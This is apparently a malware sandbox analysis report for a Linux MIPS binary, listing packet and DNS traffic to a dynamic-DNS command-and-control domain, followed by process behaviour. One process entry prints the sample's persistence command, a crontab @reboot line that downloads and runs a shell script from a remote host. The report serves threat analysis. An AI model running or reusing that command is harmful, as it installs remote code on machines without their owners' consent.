                                                          Dec 17, 2024 21:43:43.151565075 CET580985169192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:43:43.271231890 CET51695809880.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:43:43.271630049 CET580985169192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:43:43.271683931 CET580985169192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:43:43.391304016 CET51695809880.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:43:43.391460896 CET580985169192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:43:43.511298895 CET51695809880.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:43:44.599991083 CET51695809880.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:43:44.600578070 CET580985169192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:43:44.600680113 CET580985169192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:43:45.824702978 CET43928443192.168.2.2391.189.91.42
                                                          Dec 17, 2024 21:43:49.845777988 CET5937218670192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:43:49.966504097 CET186705937280.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:43:49.966614962 CET5937218670192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:43:49.966780901 CET5937218670192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:43:50.086348057 CET186705937280.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:43:50.086481094 CET5937218670192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:43:50.206093073 CET186705937280.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:43:51.270242929 CET186705937280.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:43:51.270648003 CET5937218670192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:43:51.270648003 CET5937218670192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:43:56.521380901 CET454069421192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:43:56.641587973 CET94214540680.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:43:56.641949892 CET454069421192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:43:56.641949892 CET454069421192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:43:56.762254000 CET94214540680.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:43:56.762572050 CET454069421192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:43:56.884433031 CET94214540680.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:44:06.650693893 CET454069421192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:44:06.770637989 CET94214540680.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:44:15.862318039 CET575909153192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:44:15.982131004 CET91535759080.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:44:16.286825895 CET91535759080.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:44:16.287221909 CET575909153192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:44:18.569441080 CET94214540680.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:44:18.570000887 CET454069421192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:44:18.689719915 CET94214540680.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:44:43.601696014 CET454089421192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:44:43.721498966 CET94214540880.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:44:43.721889973 CET454089421192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:44:43.721959114 CET454089421192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:44:43.842065096 CET94214540880.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:44:43.842340946 CET454089421192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:44:43.962177038 CET94214540880.78.26.121192.168.2.23
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 17, 2024 21:42:45.026065111 CET5460853192.168.2.2351.158.108.203
                                                          Dec 17, 2024 21:42:45.142328978 CET3788853192.168.2.2351.158.108.203
                                                          Dec 17, 2024 21:42:45.267050982 CET535460851.158.108.203192.168.2.23
                                                          Dec 17, 2024 21:42:45.380973101 CET533788851.158.108.203192.168.2.23
                                                          Dec 17, 2024 21:42:52.066519976 CET4599053192.168.2.23168.235.111.72
                                                          Dec 17, 2024 21:42:52.384733915 CET5345990168.235.111.72192.168.2.23
                                                          Dec 17, 2024 21:42:59.848325968 CET5253153192.168.2.23152.53.15.127
                                                          Dec 17, 2024 21:43:00.089138031 CET5352531152.53.15.127192.168.2.23
                                                          Dec 17, 2024 21:43:07.520653009 CET4292253192.168.2.2380.152.203.134
                                                          Dec 17, 2024 21:43:12.528040886 CET5678153192.168.2.23202.61.197.122
                                                          Dec 17, 2024 21:43:12.769339085 CET5356781202.61.197.122192.168.2.23
                                                          Dec 17, 2024 21:43:20.208199978 CET3873553192.168.2.2380.152.203.134
                                                          Dec 17, 2024 21:43:25.214643002 CET3838053192.168.2.23139.84.165.176
                                                          Dec 17, 2024 21:43:30.221383095 CET4774353192.168.2.23139.84.165.176
                                                          Dec 17, 2024 21:43:35.228753090 CET3804153192.168.2.2351.158.108.203
                                                          Dec 17, 2024 21:43:35.468153954 CET533804151.158.108.203192.168.2.23
                                                          Dec 17, 2024 21:43:42.911432981 CET3399653192.168.2.23217.160.70.42
                                                          Dec 17, 2024 21:43:43.150219917 CET5333996217.160.70.42192.168.2.23
                                                          Dec 17, 2024 21:43:49.605736971 CET5224453192.168.2.23217.160.70.42
                                                          Dec 17, 2024 21:43:49.844398022 CET5352244217.160.70.42192.168.2.23
                                                          Dec 17, 2024 21:43:56.273499966 CET3507353192.168.2.23194.36.144.87
                                                          Dec 17, 2024 21:43:56.519875050 CET5335073194.36.144.87192.168.2.23
                                                          Dec 17, 2024 21:44:23.574338913 CET4374453192.168.2.23178.254.22.166
                                                          Dec 17, 2024 21:44:28.580719948 CET4246553192.168.2.23137.220.52.23
                                                          Dec 17, 2024 21:44:33.588435888 CET4485753192.168.2.23137.220.52.23
                                                          Dec 17, 2024 21:44:38.594789028 CET3550653192.168.2.2370.34.254.19
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Dec 17, 2024 21:42:45.026065111 CET192.168.2.2351.158.108.2030x156Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:42:45.142328978 CET192.168.2.2351.158.108.2030x156Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:42:52.066519976 CET192.168.2.23168.235.111.720xfc39Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:42:59.848325968 CET192.168.2.23152.53.15.1270x3bStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:07.520653009 CET192.168.2.2380.152.203.1340x6eb7Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:12.528040886 CET192.168.2.23202.61.197.1220x8e59Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:20.208199978 CET192.168.2.2380.152.203.1340x248cStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:25.214643002 CET192.168.2.23139.84.165.1760xa110Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:30.221383095 CET192.168.2.23139.84.165.1760x8806Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:35.228753090 CET192.168.2.2351.158.108.2030x373eStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:42.911432981 CET192.168.2.23217.160.70.420xc2abStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:49.605736971 CET192.168.2.23217.160.70.420x4f70Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:56.273499966 CET192.168.2.23194.36.144.870x9fb5Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:44:23.574338913 CET192.168.2.23178.254.22.1660xcdafStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:44:28.580719948 CET192.168.2.23137.220.52.230x7311Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:44:33.588435888 CET192.168.2.23137.220.52.230x6f69Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:44:38.594789028 CET192.168.2.2370.34.254.190x3f91Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Dec 17, 2024 21:42:45.267050982 CET51.158.108.203192.168.2.230x156No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:42:45.267050982 CET51.158.108.203192.168.2.230x156No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:42:45.380973101 CET51.158.108.203192.168.2.230x156No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:42:45.380973101 CET51.158.108.203192.168.2.230x156No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:42:52.384733915 CET168.235.111.72192.168.2.230xfc39No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:42:52.384733915 CET168.235.111.72192.168.2.230xfc39No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:00.089138031 CET152.53.15.127192.168.2.230x3bNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:00.089138031 CET152.53.15.127192.168.2.230x3bNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:12.769339085 CET202.61.197.122192.168.2.230x8e59No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:12.769339085 CET202.61.197.122192.168.2.230x8e59No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:35.468153954 CET51.158.108.203192.168.2.230x373eNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:35.468153954 CET51.158.108.203192.168.2.230x373eNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:43.150219917 CET217.160.70.42192.168.2.230xc2abNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:43.150219917 CET217.160.70.42192.168.2.230xc2abNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:49.844398022 CET217.160.70.42192.168.2.230x4f70No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:49.844398022 CET217.160.70.42192.168.2.230x4f70No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:56.519875050 CET194.36.144.87192.168.2.230x9fb5No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                          Dec 17, 2024 21:43:56.519875050 CET194.36.144.87192.168.2.230x9fb5No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false

                                                          System Behavior

                                                          Start time (UTC):20:42:34
                                                          Start date (UTC):17/12/2024
                                                          Path:/usr/bin/dash
                                                          Arguments:-
                                                          File size:129816 bytes
                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                          Start time (UTC):20:42:34
                                                          Start date (UTC):17/12/2024
                                                          Path:/usr/bin/rm
                                                          Arguments:rm -f /tmp/tmp.24FY65F9IU /tmp/tmp.dFfaOL50Ud /tmp/tmp.PCCj74KoGG
                                                          File size:72056 bytes
                                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                          Start time (UTC):20:42:34
                                                          Start date (UTC):17/12/2024
                                                          Path:/usr/bin/dash
                                                          Arguments:-
                                                          File size:129816 bytes
                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                          Start time (UTC):20:42:34
                                                          Start date (UTC):17/12/2024
                                                          Path:/usr/bin/rm
                                                          Arguments:rm -f /tmp/tmp.24FY65F9IU /tmp/tmp.dFfaOL50Ud /tmp/tmp.PCCj74KoGG
                                                          File size:72056 bytes
                                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                          Start time (UTC):20:42:43
                                                          Start date (UTC):17/12/2024
                                                          Path:/tmp/nshkmips.elf
                                                          Arguments:/tmp/nshkmips.elf
                                                          File size:5777432 bytes
                                                          MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                          Start time (UTC):20:42:44
                                                          Start date (UTC):17/12/2024
                                                          Path:/tmp/nshkmips.elf
                                                          Arguments:-
                                                          File size:5777432 bytes
                                                          MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                          Start time (UTC):20:42:44
                                                          Start date (UTC):17/12/2024
                                                          Path:/bin/sh
                                                          Arguments:sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
                                                          File size:129816 bytes
                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                          Start time (UTC):20:42:44
                                                          Start date (UTC):17/12/2024
                                                          Path:/bin/sh
                                                          Arguments:-
                                                          File size:129816 bytes
                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                          Start time (UTC):20:42:44
                                                          Start date (UTC):17/12/2024
                                                          Path:/bin/sh
                                                          Arguments:-
                                                          File size:129816 bytes
                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                          Start time (UTC):20:42:44
                                                          Start date (UTC):17/12/2024
                                                          Path:/usr/bin/crontab
                                                          Arguments:crontab -l
                                                          File size:43720 bytes
                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                          Start time (UTC):20:42:44
                                                          Start date (UTC):17/12/2024
                                                          Path:/bin/sh
                                                          Arguments:-
                                                          File size:129816 bytes
                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                          Start time (UTC):20:42:44
                                                          Start date (UTC):17/12/2024
                                                          Path:/usr/bin/crontab
                                                          Arguments:crontab -
                                                          File size:43720 bytes
                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                          Start time (UTC):20:42:44
                                                          Start date (UTC):17/12/2024
                                                          Path:/tmp/nshkmips.elf
                                                          Arguments:-
                                                          File size:5777432 bytes
                                                          MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                          Start time (UTC):20:42:44
                                                          Start date (UTC):17/12/2024
                                                          Path:/tmp/nshkmips.elf
                                                          Arguments:-
                                                          File size:5777432 bytes
                                                          MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                          Start time (UTC):20:42:44
                                                          Start date (UTC):17/12/2024
                                                          Path:/tmp/nshkmips.elf
                                                          Arguments:-
                                                          File size:5777432 bytes
                                                          MD5 hash:0083f1f0e77be34ad27f849842bbb00c